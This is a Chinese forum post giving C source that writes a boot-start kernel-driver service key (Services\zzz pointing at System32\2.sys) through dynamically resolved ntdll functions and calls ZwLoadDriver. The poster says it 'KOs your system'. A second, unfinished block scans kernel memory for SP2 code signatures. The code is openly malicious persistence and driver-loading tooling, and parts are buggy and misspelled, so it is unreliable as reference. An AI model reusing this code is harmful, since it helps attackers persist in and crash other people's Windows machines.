鄙视某些**哥,自以为自己一副很了不起的样子,谁都不放在眼里,装载驱动部分未放出,因为代码一放出,就可以根据此思路写许多的恶意软件,
编译器:VC6。附件:2楼
注册表自动装载驱动,直接KO你系统,本机上测试了一次。里面还有一点代码是抄袭论坛上某位兄弟的,忘了是谁,在此感谢!抄袭的代码未实现。
#include <windows.h>
#include <stdio.h>
#pragma pack(4)  /* 4-byte member alignment for the hand-declared ntdll structures below */
/* Counted UTF-16 string as used by the native (Zw*) API.
 * Length and MaximumLength are BYTE counts, not character counts;
 * every caller in this file derives them from wcslen()*sizeof(WCHAR). */
typedef struct _LSA_UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer;
}UNICODE_STRING, *PUNICODE_STRING;
/* Object-attribute block handed to ZwCreateKey; populated by the
 * InitializeObjectAttributes macro further down. */
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;  /* when non-NULL, ObjectName is interpreted relative to this open key */
PUNICODE_STRING ObjectName;
ULONG Attributes;
PVOID SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;
/* File-scope state shared with GetKernelModuleBase(); nothing is re-entrant. */
WCHAR DrvName[]=L"zzz";            /* name of the service subkey created under ...\Services\ */
HANDLE DrvKeyHandle;HANDLE DrvHandle;  /* handles to the Services key and to the new subkey */
WCHAR DrvImagePath[]=L"ImagePath"; /* value name for the driver file path */
WCHAR ImagePath[]=L"\\??\\C:\\Windows\\System32\\2.sys";  /* NT-namespace path stored as ImagePath */
UNICODE_STRING KeyName;            /* reused for both ZwCreateKey object names */
WCHAR DrvPath[]=L"\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Services\\";  /* native path of the Services key */
WCHAR DrvKeyType[]=L"Type";
DWORD DrvKType=1;                  /* written as the Type value (1 = SERVICE_KERNEL_DRIVER in the documented service-key layout) */
WCHAR PreErrorControl[]=L"ErrorConteol";  /* value name written as spelled here */
DWORD ErrorControl=1;
WCHAR PreStart[]=L"Start";
DWORD Start=0;                     /* written as the Start value (0 = SERVICE_BOOT_START in the documented layout) */
WCHAR DisplayName[]=L"DiaplayName";       /* used both as the value name and as the REG_SZ data */
WCHAR Name[]=L"zzz";               /* declared but not referenced by the visible code */
UNICODE_STRING DrvValueName,DrvTypeVaule,ErrName,StName,DisName,DriverPath;  /* counted-string wrappers for the value names above */
ULONG Disposition;OBJECT_ATTRIBUTES Obj; ULONG AA;  /* AA is declared but not referenced by the visible code */
/* Fills an OBJECT_ATTRIBUTES in place; SecurityQualityOfService is always NULL.
 * Kept as a statement-style macro (no do/while wrapper), so callers terminate it with ';'. */
#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
#define OBJ_CASE_INSENSITIVE 0x00000040L  /* ObjectName is matched case-insensitively */
/* Native registry / driver entry points, resolved from ntdll at run time with
 * GetProcAddress rather than imported; they therefore do not appear in the
 * binary's import table, which matters for static triage. */
typedef ULONG (NTAPI *ZW_CREATE_KEY)(PHANDLE KeyHandle,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,ULONG TitleIndex,PUNICODE_STRING Class,ULONG CreateOptions,PULONG Disposition );
typedef ULONG (NTAPI *ZW_SET_VALUE_KEY)(HANDLE KeyHandle,PUNICODE_STRING ValueName,ULONG TitleIndex,ULONG Type,PVOID Data,ULONG DataSize);
typedef ULONG (NTAPI *ZW_LOAD_DRIVER)(PUNICODE_STRING DriverServiceName);
/*
 * Creates a kernel-driver service entry under
 * \Registry\Machine\SYSTEM\CurrentControlSet\Services\zzz through the native
 * (ntdll) registry API and then calls ZwLoadDriver.  All inputs and outputs
 * are the file-scope globals declared above; the function takes no
 * arguments and returns nothing.  None of the Zw* return values (NTSTATUS)
 * is examined, so every failure is silent.
 *
 * Defender's note: the host-observable artifacts are a newly created
 * Services\zzz key with ImagePath / Type / Start / DisplayName-style values
 * written via ZwSetValueKey from a user-mode process that resolves the Zw*
 * exports at run time, followed by a ZwLoadDriver call.  Registry and
 * driver-load auditing on the Services hive will show both steps.
 */
VOID GetKernelModuleBase(VOID)
{
/* ntdll is always mapped, so GetModuleHandleA succeeds without LoadLibrary;
 * the resulting handle is NOT a LoadLibrary reference (see FreeLibrary below). */
HINSTANCE hModule = GetModuleHandleA("Ntdll");
/* Resolve the three native entry points dynamically; results are not NULL-checked. */
ZW_CREATE_KEY ZwCreateKey=(ZW_CREATE_KEY)GetProcAddress(hModule,"ZwCreateKey");
ZW_SET_VALUE_KEY ZwSetValueKey=(ZW_SET_VALUE_KEY)GetProcAddress(hModule,"ZwSetValueKey");
ZW_LOAD_DRIVER ZwLoadDriver=(ZW_LOAD_DRIVER)GetProcAddress(hModule,"ZwLoadDriver");
/* Open (or create) the Services key by its absolute native path. */
KeyName.Buffer=DrvPath;
KeyName.Length=wcslen(DrvPath)*sizeof(WCHAR);
KeyName.MaximumLength=KeyName.Length+sizeof(WCHAR);
InitializeObjectAttributes( &Obj, &KeyName, OBJ_CASE_INSENSITIVE, NULL, NULL );
ZwCreateKey(&DrvHandle,KEY_ALL_ACCESS,&Obj,0,NULL,REG_OPTION_NON_VOLATILE,&Disposition);
/* Create the "zzz" subkey relative to the handle just obtained (RootDirectory = DrvHandle). */
KeyName.Buffer=DrvName;
KeyName.Length=wcslen(DrvName)*sizeof(WCHAR);
KeyName.MaximumLength=KeyName.Length+sizeof(WCHAR);
InitializeObjectAttributes( &Obj, &KeyName,OBJ_CASE_INSENSITIVE,DrvHandle, NULL);
ZwCreateKey(&DrvKeyHandle, KEY_ALL_ACCESS, &Obj, 0, NULL, REG_OPTION_NON_VOLATILE,&Disposition );
/* Build counted-string wrappers for each value name (byte lengths, excluding the terminator). */
DrvValueName.Buffer=DrvImagePath;
DrvValueName.Length=wcslen(DrvImagePath)*sizeof(WCHAR);
DrvValueName.MaximumLength=DrvValueName.Length+sizeof(WCHAR);
DrvTypeVaule.Buffer=DrvKeyType;
DrvTypeVaule.Length=wcslen(DrvKeyType)*sizeof(WCHAR);
DrvTypeVaule.MaximumLength=DrvTypeVaule.Length+sizeof(WCHAR);
ErrName.Buffer=PreErrorControl;
ErrName.Length=wcslen(PreErrorControl)*sizeof(WCHAR);
ErrName.MaximumLength=ErrName.Length+sizeof(WCHAR);
StName.Buffer=PreStart;
StName.Length=wcslen(PreStart)*sizeof(WCHAR);
StName.MaximumLength=StName.Length+sizeof(WCHAR);
DisName.Buffer=DisplayName;
DisName.Length=wcslen(DisplayName)*sizeof(WCHAR);
DisName.MaximumLength=DisName.Length+sizeof(WCHAR);
/* Write the service values.  The REG_SZ display name is stored without its
 * terminator; the REG_EXPAND_SZ image path includes it (+sizeof(WCHAR)). */
ZwSetValueKey(DrvKeyHandle, &DisName, 0, REG_SZ, DisplayName, wcslen( DisplayName ) * sizeof(WCHAR) );
ZwSetValueKey(DrvKeyHandle,&DrvValueName,0,REG_EXPAND_SZ,ImagePath,wcslen(ImagePath)*sizeof(WCHAR)+sizeof(WCHAR));
ZwSetValueKey(DrvKeyHandle,&DrvTypeVaule,0,REG_DWORD,&DrvKType,sizeof(DWORD));
ZwSetValueKey(DrvKeyHandle, &ErrName, 0, REG_DWORD, &ErrorControl, sizeof(DWORD) );
ZwSetValueKey(DrvKeyHandle, &StName, 0, REG_DWORD, &Start, sizeof(DWORD) );
/* DriverPath is built from the ImagePath string and handed to ZwLoadDriver as written. */
DriverPath.Buffer=ImagePath;
DriverPath.Length=wcslen(ImagePath)*sizeof(WCHAR);
DriverPath.Length=DriverPath.Length+sizeof(WCHAR);
ZwLoadDriver(&DriverPath);
/* hModule came from GetModuleHandleA, not LoadLibrary, so this FreeLibrary
 * decrements a reference the code never took; harmless for ntdll in
 * practice but not a matching pair.  Neither key handle is closed. */
FreeLibrary(hModule);
}
抄袭的代码未实现,大家自己实现:
#include<windows.h>
#include<stdio.h>
#define SystemModuleInformation 11  /* SYSTEM_INFORMATION_CLASS selector passed to ZwQuerySystemInformation below */
/* Native entry points resolved from ntdll at run time (see GetProcAddress in GetKernelBase). */
typedef ULONG (WINAPI *ZW_QUERY_SYSTEM_INFORMATION)(DWORD, PVOID, ULONG, PULONG);
typedef ULONG (WINAPI *RTL_COMPARE_UNICODE_STRING)(PUNICODE_STRING String1,PUNICODE_STRING String2,BOOLEAN CaseInSensitive);
/* Hand-declared layout of one entry returned by the SystemModuleInformation
 * query.  Only Base and Size are read by the visible code; the remaining
 * members are carried to keep the entry size correct -- treat the field
 * names other than those two as unverified. */
typedef struct _SYSTEM_MODULE_INFORMATION {
ULONG Reserved[2];
PVOID Base;   /* load address of the module */
ULONG Size;   /* size of the mapped image, in bytes */
ULONG Flags;
USHORT Index;
USHORT Unknown;
USHORT LoadCount;
USHORT ModuleNameOffset;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
ULONG ModuleSize;  /* receives the required buffer size from the first (probe) query */
RTL_COMPARE_UNICODE_STRING RtlCompareUnicodeString;  /* resolved in GetKernelBase but not called in the visible code */
void GetKernelBase(void)
{
ULONG code1_sp2=0x0000c468,code2_sp2=0xb4c06800,code3_sp2=0x77e8804d,code4_sp2=0x33fff707;
ULONG AZ;ULONG *Buf;ULONG as;SYSTEM_MODULE_INFORMATION *Module;
ULONG NtoskrnlBase;ULONG NtoskrnlEndBase;ULONG CurAddr;ULONG i; ULONG RetAddr;
HINSTANCE hModule = GetModuleHandleA("Ntdll");
ZW_QUERY_SYSTEM_INFORMATION ZwQuerySystemInformation = (ZW_QUERY_SYSTEM_INFORMATION)GetProcAddress(hModule, "ZwQuerySystemInformation");
AZ=ZwQuerySystemInformation(SystemModuleInformation,&ModuleSize,0,&ModuleSize);
RtlCompareUnicodeString=(RTL_COMPARE_UNICODE_STRING)GetProcAddress(hModule,"RtlCompareUnicodeString");
if(!AZ);
else
if(!(Buf=(ULONG*)VirtualAllocEx(GetCurrentProcess(),NULL,ModuleSize,MEM_COMMIT,PAGE_EXECUTE_READWRITE)))
ZwQuerySystemInformation(SystemModuleInformation,Buf, ModuleSize , 0);
Module=(SYSTEM_MODULE_INFORMATION*)((ULONG*)Buf+1);
NtoskrnlEndBase=(ULONG)Module->Base+(ULONG)Module->Size;//问题
NtoskrnlBase=(ULONG)Module->Base;//问题
CurAddr=NtoskrnlBase;
free(Buf);
for(i=0x80000000;i<=0xa0000000;i++)
{
printf("开始搜索\n");
if((*((ULONG *)i)==code1_sp2)&&(*((ULONG *)(i+4))==code2_sp2)&&(*((ULONG *)(i+8))==code3_sp2)&&(((ULONG*)(i+12))==code4_sp2))
{
RetAddr=i;
printf("%x",RetAddr);
}
}